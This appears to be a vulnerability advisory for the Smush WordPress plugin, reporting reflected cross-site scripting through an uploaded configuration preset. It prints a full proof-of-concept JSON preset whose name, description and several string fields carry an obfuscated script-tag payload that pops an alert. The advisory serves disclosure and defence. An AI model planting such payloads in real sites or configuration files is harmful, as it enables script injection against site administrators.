The plugin does not sanitise and escape a configuration parameter before outputting it back in an admin page when a malicious preset configuration is uploaded, leading to Reflected Cross-Site Scripting. For the attack to succeed, an attacker would need to get an admin to upload a malicious configuration file.
Upload the following config preset via Smush > Settings > Configs (/wp-admin/admin.php?page=smush-settings&view=configs) { "id": 1645860821240, "name": " <script /**/>/**/alert(1)/**/</script /**/", "description": "\n<script /**/>/**/alert(1)/**/</script /**/\n", "config": { "configs": { "settings": { "auto": true, "lossy": false, "strip_exif": true, "resize": false, "detection": false, "original": false, "backup": false, "no_scale": false, "png_to_jpg": false, "nextgen": false, "s3": false, "gutenberg": false, "js_builder": false, "cdn": false, "usage": false, "accessible_colors": false, "keep_data": true, "lazy_load": false, "webp_mod": false } }, "strings": { "bulk_smush": [ "Automatic compression - Active\nSuper-Smush - Inactive\nMetadata - Active\nImage Resizing - Inactive\nUploaded Images - Inactive\nBackup Uploaded Images - Inactive\nPNG to JPEG Conversion - Inactive\nDisable Scaled Images - Inactive" ], "lazy_load": [ "<script /**/>/**/alert(1)/**/</script /**/" ], "cdn": [ "<script /**/>/**/alert(1)/**/</script /**/" ], "webp_mod": [ "<script /**/>/**/alert(1)/**/</script /**/" ], "integrations": [ "<script /**/>/**/alert(1)/**/</script /**/" ], "tools": [ "Image Resize Detection - Inactive" ], "settings": [ "Color Accessibility - Inactive\nUsage Tracking - Inactive\nKeep Data On Uninstall - Active" ] } }, "plugin": "912164" }
Taurus Omar
Taurus Omar
Yes
2022-05-03 (about 9 months ago)
2022-05-03 (about 9 months ago)
2022-05-04 (about 9 months ago)